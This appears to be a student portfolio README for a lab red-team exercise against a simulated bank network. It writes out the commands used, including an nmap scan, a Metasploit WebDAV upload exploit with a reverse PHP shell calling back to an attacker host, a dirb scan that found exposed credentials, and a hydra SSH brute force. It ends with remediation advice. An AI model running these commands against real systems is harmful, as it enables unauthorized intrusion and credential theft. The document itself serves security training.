A beginner-friendly, full-scope red teaming simulation conducted against PJ Bank's virtual infrastructure. This project involves reconnaissance, vulnerability scanning, exploitation of both Windows and Linux machines, and professional reporting.

This simulation mimics a real-world penetration test and follows standard red team methodology. The infrastructure includes:

• Used whois.com to gather registration info on learnaboutsecurity.com

• Used dnsdumpster.com to discover DNS records and host IPs

• Identified technologies like Cloudflare, Font Awesome, and HSTS using Wappalyzer

nmap -sV -p- -T4 -Pn 10.1.2.4 Discovered Apache 2.2.14 (outdated)

bash Copy Edit use exploit/windows/http/xampp_webdav_upload_php set payload php/reverse_php set RHOST 10.1.2.4 set LHOST 10.1.2.5 set LPORT 4444 run Gained shell access to Windows 10 machine

🖥️ Target 1: DMZiServer 🔍 Directory Scan

dirb http://10.1.0.7/ ~/Downloads/Udacity.txt Found .git/ directory and extracted keys.txt containing:

username: admin123 password: Password123! 🔐 Target 2: Debian Internal Server 🔓 Brute-Forcing SSH

hydra -l admin123 -P ~/Downloads/Udacity.txt ssh://10.1.0.12 Successfully cracked credentials

ssh [email protected] whoami hostname Gained full shell access

🔒 Key Vulnerabilities Severity Issue High Public .git/ with exposed credentials High SSH access via weak credentials Medium Apache 2.2.14 outdated and exploitable Low Misconfigured /server-status endpoint

Block access to developer folders like .git/

Enforce strong password and MFA policies

Regularly patch public-facing software

####🧰 Tools Used Kali Linux

whois, dnsdumpster, wappalyzer

nmap, dirb, hydra, msfconsole

All evidence and screenshots are saved in the /screenshots directory and referenced in the final report.

Jamilu Ibrahim Richifa LinkedIn | GitHub